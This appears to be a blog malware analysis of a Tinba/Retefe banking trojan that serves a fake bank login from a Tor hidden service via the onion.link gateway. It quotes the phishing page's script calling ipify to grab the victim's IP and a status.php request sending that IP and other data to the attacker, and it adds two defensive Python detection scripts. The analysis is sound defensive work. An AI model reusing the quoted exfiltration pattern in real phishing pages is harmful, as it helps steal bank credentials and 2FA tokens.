Monday, February 1, 2016

Usage of Tor by Tinba malware

It is not new that cyber criminals and malware developers use Tor. Today I ended up with a very nice sample of the Tinba / Retefe family which has evolved to make use of Tor.
The sample, which has already been in VT for some days (d770040d2bf4c12c9dc8fd1bfc23bc9b), is named 'Verifikation.exe' and looks like a legitimate application for accessing the bank's e-banking.



So far all the malware related to Retefe / Tinba I wrote about tried to steal the victim's bank credentials while infecting the Windows system. Later on, in order to also steal the two-factor authentication token, it fooled the user into installing a malicious Android application which forwards all incoming SMS messages to the 'bad guys'. However, some banks do not use SMS tokens as 2FA, but an RSA token or calculator which generates the tokens.



Going back to the 'Verifikation.exe' application: when launching it, the first thing that happens is that a window simulating the e-banking login shows up. This is how the bad guys try to fool the victim.




Looking at the network traffic, the first interesting thing that happens is a DNS query to a strange domain: b3pepirxq7l2aybj.onion.link. After the domain has resolved, there is an HTTP GET request to it.


What does that domain mean? onion.link is an existing domain which acts as a gateway, making Tor hidden services reachable from the regular web. For more information see: http://www.onion.link/faq.html
This means that the website is hosted on the dark web at the URL http://b3pepirxq7l2aybj.onion
Indeed, when I access that address directly from the Tor Browser, I get the fake website of the bank:


This is very interesting stuff.
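The DNS lookup of a hostname ending in onion.link is something a defender can alert on and pivot from, exactly as the post does by stripping the gateway suffix to get the .onion address. The following Python script is an added example and is not code from the original post: it scans constructed DNS query-log lines, recognises gateway hostnames (only onion.link, the gateway seen here, is listed; the suffix tuple and the log-line format are assumptions) and recovers the hidden-service name behind them, while ignoring lookups of the gateway's own site such as www.onion.link.

```python
import re
from typing import List, Optional, Tuple

# Gateway suffixes that expose Tor hidden services to the regular web.
# Only onion.link (the gateway seen in this sample) is listed; the tuple is
# an assumption and can be extended with other gateways you track.
GATEWAY_SUFFIXES = ("onion.link",)

# Hidden-service names of the kind seen in the post: 16 base32 characters.
ONION_LABEL = re.compile(r"[a-z2-7]{16}")

# Assumed (constructed) DNS query-log format:
#   <date> <time> client <ip> query: <qname> <qtype>
DNS_LINE = re.compile(
    r"^\S+ \S+ client (?P<client>\S+) query: (?P<qname>\S+) (?P<qtype>\S+)$"
)

# Constructed sample log: one lookup of the gateway hostname from the post,
# plus benign lookups that must not be flagged.
SAMPLE_DNS_LOG = """\
2016-02-01 10:15:01 client 10.0.0.12 query: www.example-bank.test A
2016-02-01 10:15:02 client 10.0.0.12 query: b3pepirxq7l2aybj.onion.link A
2016-02-01 10:15:02 client 10.0.0.12 query: api.ipify.org A
2016-02-01 10:15:40 client 10.0.0.27 query: www.onion.link A
2016-02-01 10:16:03 client 10.0.0.27 query: onion.link.example.test A
"""


def onion_from_gateway(hostname: str) -> Optional[str]:
    """Map a gateway hostname to the hidden service behind it.

    b3pepirxq7l2aybj.onion.link -> b3pepirxq7l2aybj.onion
    Returns None for hostnames that do not use a known gateway, or where
    the label in front of the gateway is not a hidden-service name
    (e.g. www.onion.link, the gateway's own site).
    """
    host = hostname.lower().rstrip(".")
    for suffix in GATEWAY_SUFFIXES:
        if host.endswith("." + suffix):
            labels = host[: -len(suffix) - 1].split(".")
            candidate = labels[-1]  # label directly in front of the gateway
            if ONION_LABEL.fullmatch(candidate):
                return candidate + ".onion"
    return None


def scan_dns_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client, queried name, recovered .onion) for every gateway lookup."""
    hits = []
    for line in text.splitlines():
        m = DNS_LINE.match(line)
        if not m:
            continue
        onion = onion_from_gateway(m["qname"])
        if onion:
            hits.append((m["client"], m["qname"], onion))
    return hits


if __name__ == "__main__":
    for client, qname, onion in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} resolved {qname} -> hidden service {onion}")
```

Matching on the label directly in front of the gateway suffix, rather than on the suffix alone, is what keeps a visit to the gateway's FAQ page (www.onion.link) out of the alerts while still catching the hidden-service hostname.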

Looking at the HTTP request/response and the HTML code, there is something interesting:


    ...
    	</div>
    	[truncated]<script>var codehelper_ip={};function getip(v){if(typeof(v)!='undefined') codehelper_ip.IP=v.ip;}</script><script src="https://api.ipify.org/?format=jsonp&callback=getip"></script><script>document.write("<script src='/ajax/st
    	</body>
    ...


The https://www.ipify.org/ service is used to gather the public source IP of the user, in this case the victim. Moreover, there are several HTTP requests which send the IP of the victim together with other data:



(http://b3pepirxq7l2aybj.onion.link/ajax/status.php?cmdid=8&gettype=t&id=149&ip=x.x.x.x)

This same "ajax/status.php" resource is also used to send data via POST, base64 encoded, which can be easily decoded:
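The status.php traffic above (victim IP passed as a GET parameter, then base64-encoded POST bodies to the same resource) is easy to inspect once the request is flagged. The following Python script is an added example, not code from the original post or from the malware: it takes a request method, URL and body as a proxy or capture tool would hand them over, flags requests to a gateway host (only onion.link from the post is listed; an assumption), pulls the ip parameter out of the query string and decodes the POST body, restoring base64 padding that some clients strip. The GET URL mirrors the one in the post with a documentation-range address standing in for x.x.x.x; the POST plaintext is a constructed key/value string, not the sample's real payload.

```python
import base64
import binascii
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

# Gateway suffixes to watch; only onion.link from the post is listed (assumption).
GATEWAY_SUFFIXES = ("onion.link",)

# Constructed sample traffic. The GET mirrors the status.php request shown in
# the post with a documentation-range IP standing in for x.x.x.x; the POST body
# is a made-up key/value string, base64 encoded with its '=' padding removed,
# which some clients do and which a naive decoder rejects.
SAMPLE_GET_URL = (
    "http://b3pepirxq7l2aybj.onion.link/ajax/status.php"
    "?cmdid=8&gettype=t&id=149&ip=198.51.100.7"
)
SAMPLE_POST_URL = "http://b3pepirxq7l2aybj.onion.link/ajax/status.php"
SAMPLE_POST_PLAINTEXT = "id=149&cmdid=8&ip=198.51.100.7&dob=1.1.1970"
SAMPLE_POST_BODY = base64.b64encode(SAMPLE_POST_PLAINTEXT.encode()).decode().rstrip("=")


def is_gateway_host(host: str) -> bool:
    """True for the gateway itself or any hostname underneath it."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in GATEWAY_SUFFIXES)


def decode_b64_body(body: str) -> Optional[bytes]:
    """Decode a base64 request body, restoring missing padding.
    Returns None when the body is not valid base64."""
    s = "".join(body.split())          # tolerate stray whitespace/newlines
    s += "=" * (-len(s) % 4)           # restore stripped padding
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_request(method: str, url: str, body: str = "") -> Optional[Dict]:
    """Return a finding for requests to a gateway host, else None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not is_gateway_host(host):
        return None
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    finding = {
        "host": host,
        "path": parts.path,
        "query": query,
        "client_ip_in_query": query.get("ip"),   # victim IP leaked as a parameter
        "decoded_body": None,
    }
    if method.upper() == "POST" and body:
        raw = decode_b64_body(body)
        finding["decoded_body"] = raw.decode("utf-8", "replace") if raw else None
    return finding


if __name__ == "__main__":
    print(inspect_request("GET", SAMPLE_GET_URL))
    print(inspect_request("POST", SAMPLE_POST_URL, SAMPLE_POST_BODY))
```

Decoding with validate=True means a body that merely looks base64-ish but contains characters outside the alphabet is reported as not decodable instead of yielding garbage, which keeps the decoded field trustworthy when the finding is handed to an analyst.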






As mentioned at the beginning, some banks do not use SMS as 2FA, and this bank is one of them. A physical calculator is needed to generate the token, so the malware must also be able to capture this token.

Before asking for the generated token, the fake bank page asks for some personal details, for example the date of birth.




The last step is to ask for the token generated by the calculator, which gives access to the victim's account.